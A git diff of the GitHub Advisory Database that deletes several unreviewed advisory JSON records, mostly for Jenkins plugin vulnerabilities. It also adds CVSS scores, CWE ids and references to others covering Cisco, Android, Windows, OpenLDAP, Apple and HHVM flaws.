a/advisories/unreviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json b/advisories/unreviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json deleted file mode 100644 index 21731e0527d58..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-45ch-hxgr-vx8j", - "modified": "2022-05-13T01:13:09Z", - "published": "2022-05-13T01:13:09Z", - "aliases": [ - "CVE-2010-1618" - ], - "details": "Cross-site scripting (XSS) vulnerability in the phpCAS client library before 1.1.0, as used in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled in an error message.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1618" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html" - }, - { - "type": "WEB", - "url": "http://moodle.org/security/" - }, - { - "type": "WEB", - "url": "http://www.ja-sig.org/issues/browse/PHPCAS-52" - }, - { - "type": "WEB", - "url": "http://www.ja-sig.org/wiki/display/CASC/phpCAS+ChangeLog" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1107" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-04-29T21:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json b/advisories/unreviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json deleted file mode 100644 index e7ad944e5338a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-45fr-w365-f7pm", - "modified": "2022-05-13T01:17:45Z", - "published": "2022-05-13T01:17:45Z", - "aliases": [ - "CVE-2019-1003053" - ], - "details": "Jenkins HockeyApp Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003053" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-839" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-311" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json b/advisories/unreviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json deleted file mode 100644 index 84c80cfc7e108..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-46rr-87h4-f5q6", - "modified": "2023-10-25T18:31:31Z", - "published": "2022-05-24T17:03:47Z", - "aliases": [ - "CVE-2019-16561" - ], - "details": "Jenkins WebSphere Deployer Plugin 1.6.1 and earlier allows users with Overall/Read access to disable SSL/TLS certificate and hostname validation for the entire Jenkins master JVM.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16561" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1581" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-12-17T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json b/advisories/unreviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json deleted file mode 100644 index 86928b37a6312..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-477r-v22q-r42f", - "modified": "2022-05-17T00:29:00Z", - "published": "2022-05-17T00:29:00Z", - "aliases": [ - "CVE-2017-1000088" - ], - "details": "The Sidebar Link plugin allows users able to configure jobs, views, and agents to add entries to the sidebar of these objects. There was no input validation, which meant users were able to use javascript: schemes for these links.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000088" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-07-10/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json b/advisories/unreviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json deleted file mode 100644 index 84a0960961d17..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-47rr-8vrp-9283", - "modified": "2023-10-25T18:31:24Z", - "published": "2022-05-24T16:52:45Z", - "aliases": [ - "CVE-2019-10375" - ], - "details": "An arbitrary file read vulnerability in Jenkins File System SCM Plugin 2.1 and earlier allows attackers able to configure jobs in Jenkins to obtain the contents of any file on the Jenkins master.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10375" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-569" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-07T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json b/advisories/unreviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json deleted file mode 100644 index 9070443a02127..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-492x-gfqx-wpf3", - "modified": "2022-05-13T01:17:42Z", - "published": "2022-05-13T01:17:42Z", - "aliases": [ - "CVE-2019-1003077" - ], - "details": "A missing permission check in Jenkins Audit to Database Plugin in the DbAuditPublisherDescriptorImpl#doTestJdbcConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003077" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-977" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-4m9r-j9f4-4m4g/GHSA-4m9r-j9f4-4m4g.json b/advisories/unreviewed/2022/05/GHSA-4m9r-j9f4-4m4g/GHSA-4m9r-j9f4-4m4g.json index b72da23412a62..043af9e74da1e 100644 --- a/advisories/unreviewed/2022/05/GHSA-4m9r-j9f4-4m4g/GHSA-4m9r-j9f4-4m4g.json +++ b/advisories/unreviewed/2022/05/GHSA-4m9r-j9f4-4m4g/GHSA-4m9r-j9f4-4m4g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4m9r-j9f4-4m4g", - "modified": "2022-05-24T17:45:11Z", + "modified": "2024-02-07T18:30:26Z", "published": "2022-05-24T17:45:11Z", "aliases": [ "CVE-2021-1220" ], "details": "Multiple vulnerabilities in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker with read-only privileges to cause the web UI software to become unresponsive and consume vty line instances, resulting in a denial of service (DoS) condition. These vulnerabilities are due to insufficient error handling in the web UI. An attacker could exploit these vulnerabilities by sending crafted HTTP packets to an affected device. A successful exploit could allow the attacker to cause the web UI software to become unresponsive and consume all available vty lines, preventing new session establishment and resulting in a DoS condition. Manual intervention would be required to regain web UI and vty session functionality. Note: These vulnerabilities do not affect the console connection.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json b/advisories/unreviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json deleted file mode 100644 index 96d1fe6267ccb..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-4mvc-33v7-cqc3", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003087" - ], - "details": "A missing permission check in Jenkins Chef Sinatra Plugin in the ChefBuilderConfiguration.DescriptorImpl#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003087" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1037" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-4px9-cjxh-m369/GHSA-4px9-cjxh-m369.json b/advisories/unreviewed/2022/05/GHSA-4px9-cjxh-m369/GHSA-4px9-cjxh-m369.json index 6c3de5bfc9f9e..aa09d943b58d6 100644 --- a/advisories/unreviewed/2022/05/GHSA-4px9-cjxh-m369/GHSA-4px9-cjxh-m369.json +++ b/advisories/unreviewed/2022/05/GHSA-4px9-cjxh-m369/GHSA-4px9-cjxh-m369.json @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://kb.juniper.net/KB27375" }, + { + "type": "WEB", + "url": "https://supportportal.juniper.net/JSA10568" + }, { "type": "WEB", "url": "http://secunia.com/advisories/53359" diff --git a/advisories/unreviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json b/advisories/unreviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json deleted file mode 100644 index 2a57117e14a68..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5293-3fgp-cr3x", - "modified": "2022-05-13T01:18:19Z", - "published": "2022-05-13T01:18:19Z", - "aliases": [ - "CVE-2017-1000086" - ], - "details": "The Periodic Backup Plugin did not perform any permission checks, allowing any user with Overall/Read access to change its settings, trigger backups, restore backups, download backups, and also delete all previous backups via log rotation. Additionally, the plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000086" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-07-10/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/100437" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json b/advisories/unreviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json deleted file mode 100644 index 51cb8aff47f1b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5339-9974-hqj9", - "modified": "2022-05-14T02:21:28Z", - "published": "2022-05-14T02:21:28Z", - "aliases": [ - "CVE-2018-1999039" - ], - "details": "A server-side request forgery vulnerability exists in Jenkins Confluence Publisher Plugin 2.0.1 and earlier in ConfluenceSite.java that allows attackers to have Jenkins submit login requests to an attacker-specified Confluence server URL with attacker specified credentials.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999039" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-982" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-08-01T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json b/advisories/unreviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json deleted file mode 100644 index ed082a44804e6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5532-prrf-rf5x", - "modified": "2022-05-13T01:41:14Z", - "published": "2022-05-13T01:41:14Z", - "aliases": [ - "CVE-2017-1000403" - ], - "details": "Jenkins Speaks! Plugin, all current versions, allows users with Job/Configure permission to run arbitrary Groovy code inside the Jenkins JVM, effectively elevating privileges to Overall/Run Scripts.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000403" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-10-11/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-732" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-26T02:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-55v6-vvqw-j3qq/GHSA-55v6-vvqw-j3qq.json b/advisories/unreviewed/2022/05/GHSA-55v6-vvqw-j3qq/GHSA-55v6-vvqw-j3qq.json index ddbc26bf343c9..07478d23271cc 100644 --- a/advisories/unreviewed/2022/05/GHSA-55v6-vvqw-j3qq/GHSA-55v6-vvqw-j3qq.json +++ b/advisories/unreviewed/2022/05/GHSA-55v6-vvqw-j3qq/GHSA-55v6-vvqw-j3qq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-55v6-vvqw-j3qq", - "modified": "2022-05-24T17:08:53Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-24T17:08:53Z", "aliases": [ "CVE-2020-0022" ], "details": "In reassemble_and_dispatch of packet_fragmenter.cc, there is possible out of bounds write due to an incorrect bounds calculation. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-143894715", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-682" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json b/advisories/unreviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json deleted file mode 100644 index c1929eb70d2e9..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-56ff-m6pv-8594", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003079" - ], - "details": "A missing permission check in Jenkins VMware Lab Manager Slaves Plugin in the LabManager.DescriptorImpl#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003079" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-979" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json b/advisories/unreviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json deleted file mode 100644 index cb788e936905a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-56gj-927p-mfph", - "modified": "2023-10-25T18:31:25Z", - "published": "2022-05-24T16:55:59Z", - "aliases": [ - "CVE-2019-10397" - ], - "details": "Jenkins Aqua Security Serverless Scanner Plugin 1.0.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10397" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-12/#SECURTY-1509" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/12/2" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-319" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-12T14:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-56xw-8wf9-j3x9/GHSA-56xw-8wf9-j3x9.json b/advisories/unreviewed/2022/05/GHSA-56xw-8wf9-j3x9/GHSA-56xw-8wf9-j3x9.json index 95bd1ea910fc4..3d6fce7fdc5f6 100644 --- a/advisories/unreviewed/2022/05/GHSA-56xw-8wf9-j3x9/GHSA-56xw-8wf9-j3x9.json +++ b/advisories/unreviewed/2022/05/GHSA-56xw-8wf9-j3x9/GHSA-56xw-8wf9-j3x9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-56xw-8wf9-j3x9", - "modified": "2022-05-02T03:13:43Z", + "modified": "2024-02-08T03:32:44Z", "published": "2022-05-02T03:13:43Z", "aliases": [ "CVE-2009-0231" ], "details": "The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka \"Embedded OpenType Font Heap Overflow Vulnerability.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -49,7 +52,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-681" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-5794-fx2j-p63j/GHSA-5794-fx2j-p63j.json b/advisories/unreviewed/2022/05/GHSA-5794-fx2j-p63j/GHSA-5794-fx2j-p63j.json index 3ff9b790d99ff..1d1dc23f32b93 100644 --- a/advisories/unreviewed/2022/05/GHSA-5794-fx2j-p63j/GHSA-5794-fx2j-p63j.json +++ b/advisories/unreviewed/2022/05/GHSA-5794-fx2j-p63j/GHSA-5794-fx2j-p63j.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5794-fx2j-p63j", - "modified": "2022-05-01T07:31:47Z", + "modified": "2024-02-08T03:32:44Z", "published": "2022-05-01T07:31:47Z", "aliases": [ "CVE-2006-5779" ], "details": "OpenLDAP before 2.3.29 allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -113,7 +116,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-617" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json b/advisories/unreviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json deleted file mode 100644 index 6fc288a2ea88f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-57gg-cj55-q5g2", - "modified": "2022-05-24T22:01:23Z", - "published": "2022-05-24T22:01:23Z", - "aliases": [ - "CVE-2020-25816" - ], - "summary": "Token leases could outlive their TTL in HashiCorp Vault", - "details": "HashiCorp Vault and Vault Enterprise 1.0 before 1.5.4 have Incorrect Access Control.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25816" - }, - { - "type": "WEB", - "url": "https://github.com/hashicorp/vault/pull/10020/commits/f192878110fe93eb13da914b2bee28caa7866a29" - }, - { - "type": "WEB", - "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#147" - }, - { - "type": "WEB", - "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#154" - }, - { - "type": "WEB", - "url": "https://www.hashicorp.com/blog/category/vault" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-613" - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-09-30T20:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5c3m-78cg-3wpv/GHSA-5c3m-78cg-3wpv.json b/advisories/unreviewed/2022/05/GHSA-5c3m-78cg-3wpv/GHSA-5c3m-78cg-3wpv.json index ce8881fca6046..69edaa49d0978 100644 --- a/advisories/unreviewed/2022/05/GHSA-5c3m-78cg-3wpv/GHSA-5c3m-78cg-3wpv.json +++ b/advisories/unreviewed/2022/05/GHSA-5c3m-78cg-3wpv/GHSA-5c3m-78cg-3wpv.json @@ -40,6 +40,10 @@ { "type": "WEB", "url": "https://seclists.org/oss-sec/2019/q4/101" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/06/3" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-5g93-pf3w-6f59/GHSA-5g93-pf3w-6f59.json b/advisories/unreviewed/2022/05/GHSA-5g93-pf3w-6f59/GHSA-5g93-pf3w-6f59.json index 4d0a08661d2d7..7037f29de3ac4 100644 --- a/advisories/unreviewed/2022/05/GHSA-5g93-pf3w-6f59/GHSA-5g93-pf3w-6f59.json +++ b/advisories/unreviewed/2022/05/GHSA-5g93-pf3w-6f59/GHSA-5g93-pf3w-6f59.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5g93-pf3w-6f59", - "modified": "2022-05-24T19:13:29Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-24T19:13:29Z", "aliases": [ "CVE-2021-30663" ], "details": "An integer overflow was addressed with improved input validation. This issue is fixed in iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, Safari 14.1.1, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-5h4f-x39p-f6v8/GHSA-5h4f-x39p-f6v8.json b/advisories/unreviewed/2022/05/GHSA-5h4f-x39p-f6v8/GHSA-5h4f-x39p-f6v8.json index f7cfd4b966692..cefdd26f25702 100644 --- a/advisories/unreviewed/2022/05/GHSA-5h4f-x39p-f6v8/GHSA-5h4f-x39p-f6v8.json +++ b/advisories/unreviewed/2022/05/GHSA-5h4f-x39p-f6v8/GHSA-5h4f-x39p-f6v8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5h4f-x39p-f6v8", - "modified": "2022-05-24T17:02:39Z", + "modified": "2024-02-08T21:30:32Z", "published": "2022-05-24T17:02:39Z", "aliases": [ "CVE-2019-11930" ], "details": "An invalid free in mb_detect_order can cause the application to crash or potentially result in remote code execution. This issue affects HHVM versions prior to 3.30.12, all versions between 4.0.0 and 4.8.5, all versions between 4.9.0 and 4.23.1, as well as 4.24.0, 4.25.0, 4.26.0, 4.27.0, 4.28.0, and 4.28.1.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-763" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json b/advisories/unreviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json deleted file mode 100644 index e38d8ab8af4bf..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5jph-mvfm-r27p", - "modified": 